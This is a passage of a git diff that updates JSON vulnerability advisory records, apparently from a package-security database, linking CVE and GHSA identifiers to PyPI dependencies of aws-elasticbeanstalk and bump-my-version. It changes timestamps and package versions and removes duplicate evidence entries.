@@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2024-37891", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-34jh-p97f-mpxf", "CVE-2024-37891", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2024-47081.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2024-47081.json index d53cbc63aed..d3041cf3714 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2024-47081.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2024-47081.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2024-47081", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-9hjg-9r4m-mvj7", "CVE-2024-47081", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2024-6345.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2024-6345.json index 46eaf1e5de7..f7adb17a43b 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2024-6345.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2024-6345.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2024-6345", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-cx63-2mw6-8hw5", "BIT-setuptools-2024-6345", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "83.0.0", - "key": "pkg:pypi/setuptools@83.0.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2025-47273.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2025-47273.json index 0b2f223e6cc..51335feb246 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2025-47273.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2025-47273.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2025-47273", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-5rjg-fvgr-3xxf", "BIT-setuptools-2025-47273", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "83.0.0", - "key": "pkg:pypi/setuptools@83.0.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2025-50181.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2025-50181.json index 38e51616622..55409ae32bc 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2025-50181.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2025-50181.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2025-50181", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-pq67-6m6q-mj2v", "CVE-2025-50181", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2025-50182.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2025-50182.json index f994699fa2e..217e31ca3f3 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2025-50182.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2025-50182.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2025-50182", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-48p4-8xcf-vxj5", "CVE-2025-50182", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2025-66418.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2025-66418.json index 0889cb0a272..80a0ec60afc 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2025-66418.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2025-66418.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2025-66418", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-gm62-xv2j-4w53", "CVE-2025-66418", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2025-66471.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2025-66471.json index b03ddd45066..ada1bdda1b5 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2025-66471.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2025-66471.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2025-66471", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-2xpw-w6gg-jr37", "CVE-2025-66471", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2025-69277.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2025-69277.json index be45af90d99..3c7378b05e5 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2025-69277.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2025-69277.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2025-69277", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-mrfv-m5wm-5w6w", "CVE-2025-69277", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pynacl", - "subject_version": "1.6.2", - "key": "pkg:pypi/pynacl@1.6.2", - "resource": "pynacl" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2026-21441.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2026-21441.json index 2860f574363..a5c64e128be 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2026-21441.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2026-21441.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2026-21441", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-38jv-5279-wg99", "CVE-2026-21441", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2026-25645.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2026-25645.json index 5c1b426c90a..f175e94b67a 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2026-25645.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2026-25645.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2026-25645", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-gc5v-m9x4-r6x2", "CVE-2026-25645", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2026-44405.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2026-44405.json index 2704569f689..7d8cd43b619 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2026-44405.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2026-44405.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2026-44405", "published": "2026-08-13T16:37:01Z", - "modified": "2026-09-02T16:21:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-r374-rxx8-8654", "CVE-2026-44405", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "paramiko", - "subject_version": "5.0.0", - "key": "pkg:pypi/paramiko@5.0.0", - "resource": "paramiko" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2026-44431.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2026-44431.json index eefde1d63b0..6c64873a83b 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2026-44431.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2026-44431.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2026-44431", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-qccp-gfcp-xxvc", "CVE-2026-44431", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2026-44432.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2026-44432.json index c9e10f6d1ae..8e0de5bc88d 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2026-44432.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2026-44432.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2026-44432", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-mf9v-mfxr-j63j", "CVE-2026-44432", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2026-45409.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2026-45409.json index 8392f6ad90c..5748a0badef 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2026-45409.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2026-45409.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2026-45409", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-65pc-fj4g-8rjx", "CVE-2026-45409", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-aws-elasticbeanstalk-CVE-2026-59890.json b/advisories/BREW-aws-elasticbeanstalk-CVE-2026-59890.json index 94ae6302bf8..c34d0120670 100644 --- a/advisories/BREW-aws-elasticbeanstalk-CVE-2026-59890.json +++ b/advisories/BREW-aws-elasticbeanstalk-CVE-2026-59890.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-aws-elasticbeanstalk-CVE-2026-59890", "published": "2026-08-13T16:37:01Z", - "modified": "2026-08-13T16:37:01Z", + "modified": "2026-09-10T18:54:04Z", "upstream": [ "GHSA-h35f-9h28-mq5c", "BIT-setuptools-2026-59890", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "83.0.0", - "key": "pkg:pypi/setuptools@83.0.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-bump-my-version-CVE-2015-8557.json b/advisories/BREW-bump-my-version-CVE-2015-8557.json index 1a2be85066a..1f5d7e3aba4 100644 --- a/advisories/BREW-bump-my-version-CVE-2015-8557.json +++ b/advisories/BREW-bump-my-version-CVE-2015-8557.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-bump-my-version-CVE-2015-8557", "published": "2026-08-13T16:38:25Z", - "modified": "2026-08-13T16:38:25Z", + "modified": "2026-09-10T18:58:22Z", "upstream": [ "GHSA-fff8-4w9p-7v76", "CVE-2015-8557", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.1", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-bump-my-version-CVE-2021-20270.json b/advisories/BREW-bump-my-version-CVE-2021-20270.json index d7f374a933c..6cd26595ee5 100644 --- a/advisories/BREW-bump-my-version-CVE-2021-20270.json +++ b/advisories/BREW-bump-my-version-CVE-2021-20270.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-bump-my-version-CVE-2021-20270", "published": "2026-08-13T16:38:25Z", - "modified": "2026-08-13T16:38:25Z", + "modified": "2026-09-10T18:58:22Z", "upstream": [ "GHSA-9w8r-397f-prfh", "CVE-2021-20270", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.7.4", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-bump-my-version-CVE-2021-27291.json b/advisories/BREW-bump-my-version-CVE-2021-27291.json index 2d66ba8e28b..12931974f27 100644 --- a/advisories/BREW-bump-my-version-CVE-2021-27291.json +++ b/advisories/BREW-bump-my-version-CVE-2021-27291.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-bump-my-version-CVE-2021-27291", "published": "2026-08-13T16:38:25Z", - "modified": "2026-08-13T16:38:25Z", + "modified": "2026-09-10T18:58:22Z", "upstream": [ "GHSA-pq64-v7f5-gqh8", "CVE-2021-27291", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.7.4", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-bump-my-version-CVE-2022-40896.json b/advisories/BREW-bump-my-version-CVE-2022-40896.json index 9c9d7f659f7..05a751af29c 100644 --- a/advisories/BREW-bump-my-version-CVE-2022-40896.json +++ b/advisories/BREW-bump-my-version-CVE-2022-40896.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-bump-my-version-CVE-2022-40896", "published": "2026-08-13T16:38:25Z", - "modified": "2026-08-13T16:38:25Z", + "modified": "2026-09-10T18:58:22Z", "upstream": [ "GHSA-mrwq-x4v8-fh7p", "CVE-2022-40896", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.15.0", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-bump-my-version-CVE-2023-26302.json b/advisories/BREW-bump-my-version-CVE-2023-26302.json index d448ffb35f1..e769d8d3d04 100644 --- a/advisories/BREW-bump-my-version-CVE-2023-26302.json +++ b/advisories/BREW-bump-my-version-CVE-2023-26302.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-bump-my-version-CVE-2023-26302", "published": "2026-08-13T16:38:25Z", - "modified": "2026-08-13T16:38:25Z", + "modified": "2026-09-10T18:58:22Z", "upstream": [ "GHSA-jrwr-5x3p-hvc3", "CVE-2023-26302", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "markdown-it-py", - "subject_version": "4.2.0", - "key": "pkg:pypi/markdown-it-py@4.2.0", - "resource": "markdown-it-py" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-bump-my-version-CVE-2023-26303.json b/advisories/BREW-bump-my-version-CVE-2023-26303.json index 239cea329b9..1e4a44daaef 100644 --- a/advisories/BREW-bump-my-version-CVE-2023-26303.json +++ b/advisories/BREW-bump-my-version-CVE-2023-26303.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-bump-my-version-CVE-2023-26303", "published": "2026-08-13T16:38:25Z", - "modified": "2026-08-13T16:38:25Z", + "modified": "2026-09-10T18:58:22Z", "upstream": [ "GHSA-vrjv-mxr7-vjf8", "CVE-2023-26303", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "markdown-it-py", - "subject_version": "4.2.0", - "key": "pkg:pypi/markdown-it-py@4.2.0", - "resource": "markdown-it-py" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-bump-my-version-CVE-2024-3651.json b/advisories/BREW-bump-my-version-CVE-2024-3651.json index 4016bd579af..029d29fb4ac 100644 --- a/advisories/BREW-bump-my-version-CVE-2024-3651.json +++ b/advisories/BREW-bump-my-version-CVE-2024-3651.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-bump-my-version-CVE-2024-3651", "published": "2026-08-13T16:38:25Z", - "modified": "2026-08-13T16:38:25Z", + "modified": "2026-09-10T18:58:22Z", "upstream": [ "GHSA-jjg7-2v4v-x38h", "CVE-2024-3651", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.7", "resource": "idna", - "resource_purl": "pkg:pypi/idna@3.18" + "resource_purl": "pkg:pypi/idna@3.19" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", - "resource": "idna" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" } ] diff --git a/advisories/BREW-bump-my-version-CVE-2025-43859.json b/advisories/BREW-bump-my-version-CVE-2025-43859.json index 6384a0009b6..c4339f6fd2f 100644 --- a/advisories/BREW-bump-my-version-CVE-2025-43859.json +++ b/advisories/BREW-bump-my-version-CVE-2025-43859.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-bump-my-version-CVE-2025-43859", "published": "2026-08-13T16:38:25Z", - "modified": "2026-08-13T16:38:25Z", + "modified": "2026-09-10T18:57:47Z", "upstream": [ "GHSA-vqfr-h8mv-ghfj", "CVE-2025-43859", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "h11", - "subject_version": "0.16.0", - "key": "pkg:pypi/h11@0.16.0", - "resource": "h11" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-bump-my-version-CVE-2026-28684.json b/advisories/BREW-bump-my-version-CVE-2026-28684.json index 5909ce4d2fa..34e523a3306 100644 --- a/advisories/BREW-bump-my-version-CVE-2026-28684.json +++ b/advisories/BREW-bump-my-version-CVE-2026-28684.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-bump-my-version-CVE-2026-28684", "published": "2026-08-13T16:38:25Z", - "modified": "2026-08-13T16:38:25Z", + "modified": "2026-09-10T18:58:22Z", "upstream": [ "GHSA-mf9w-mj56-hr94", "CVE-2026-28684", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.2.2", "resource": "python-dotenv", - "resource_purl": "pkg:pypi/python-dotenv@1.2.2" + "resource_purl": "pkg:pypi/python-dotenv@1.2.3" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "python-dotenv", - "subject_version": "1.2.2", - "key": "pkg:pypi/python-dotenv@1.2.2", - "resource": "python-dotenv" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-dotenv", - "subject_version": "1.2.2", - "key": "pkg:pypi/python-dotenv@1.2.2", + "subject_version": "1.2.3", + "key": "pkg:pypi/python-dotenv@1.2.3", "resource": "python-dotenv" } ] diff --git a/advisories/BREW-bump-my-version-CVE-2026-4539.json b/advisories/BREW-bump-my-version-CVE-2026-4539.json index 6677aa5acbd..25d43134534 100644 --- a/advisories/BREW-bump-my-version-CVE-2026-4539.json +++ b/advisories/BREW-bump-my-version-CVE-2026-4539.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-bump-my-version-CVE-2026-4539", "published": "2026-08-13T16:38:25Z", - "modified": "2026-08-13T16:38:25Z", + "modified": "2026-09-10T18:58:22Z", "upstream": [ "GHSA-5239-wwwm-4pmq", "CVE-2026-4539", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.20.0", "resource": "pygments", - "resource_purl": "pkg:pypi/pygments@2.20.0" + "resource_purl": "pkg:pypi/pygments@2.21.0" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", + "subject_version": "2.21.0", + "key": "pkg:pypi/pygments@2.21.0", "resource": "pygments" } ] diff --git a/advisories/BREW-bump-my-version-CVE-2026-45409.json b/advisories/BREW-bump-my-version-CVE-2026-45409.json index c72a2e82b64..82c2ea148e2 100644 --- a/advisories/BREW-bump-my-version-CVE-2026-45409.json +++ b/advisories/BREW-bump-my-version-CVE-2026-45409.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-bump-my-version-CVE-2026-45409", "published": "2026-08-13T16:38:25Z", - "modified": "2026-08-13T16:38:25Z", + "modified": "2026-09-10T18:58:22Z", "upstream": [ "GHSA-65pc-fj4g-8rjx", "CVE-2026-45409", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.15", "resource": "idna", - "resource_purl": "pkg:pypi/idna@3.18" + "resource_purl": "pkg:pypi/idna@3.19" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", - "resource": "idna" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", + "subject_version": "3.19", + "key": "pkg:pypi/idna@3.19", "resource": "idna" } ] diff --git a/advisories/BREW-bump-my-version-CVE-2026-58203.json b/advisories/BREW-bump-my-version-CVE-2026-58203.json index c10a66e797b..db0de336f76 100644 --- a/advisories/BREW-bump-my-version-CVE-2026-58203.json +++ b/advisories/BREW-bump-my-version-CVE-2026-58203.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-bump-my-version-CVE-2026-58203", "published": "2026-08-13T16:38:25Z", - "modified": "2026-08-13T16:38:25Z", + "modified": "2026-09-10T18:58:22Z", "upstream": [ "GHSA-4xgf-cpjx-pc3j", "CVE-2026-58203" @@ -32,7 +32,7 @@ "range_state": "fixed", "upstream_fixed_in": "2.14.2", "resource": "pydantic-settings", - "resource_purl": "pkg:pypi/pydantic-settings@2.14.2" + "resource_purl": "pkg:pypi/pydantic-settings@2.15.0" } } ], @@ -45,8 +45,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pydantic-settings", - "subject_version": "2.14.2", - "key": "pkg:pypi/pydantic-settings@2.14.2", + "subject_version": "2.15.0", + "key": "pkg:pypi/pydantic-settings@2.15.0", "resource": "pydantic-settings" } ] diff --git a/advisories/BREW-bump-my-version-CVE-2026-7246.json b/advisories/BREW-bump-my-version-CVE-2026-7246.json index 729c1fe70a2..221be1df74c 100644 --- a/advisories/BREW-bump-my-version-CVE-2026-7246.json +++ b/advisories/BREW-bump-my-version-CVE-2026-7246.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-bump-my-version-CVE-2026-7246", "published": "2026-08-13T16:38:25Z", - "modified": "2026-08-13T16:38:25Z", + "modified": "2026-09-10T18:57:47Z", "upstream": [ "PYSEC-2026-2132", "CVE-2026-7246", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "8.3.3", "resource": "click", - "resource_purl": "pkg:pypi/click@8.4.2" + "resource_purl": "pkg:pypi/click@8.5.0" } } ], @@ -46,8 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "click", - "subject_version": "8.4.2", - "key": "pkg:pypi/click@8.4.2", + "subject_version": "8.5.0", + "key": "pkg:pypi/click@8.5.0", "resource": "click" } ] diff --git a/advisories/BREW-bump-my-version-CVE-2026-84378.json b/advisories/BREW-bump-my-version-CVE-2026-84378.json new file mode 100644 index 00000000000..cca02135aa7 --- /dev/null +++ 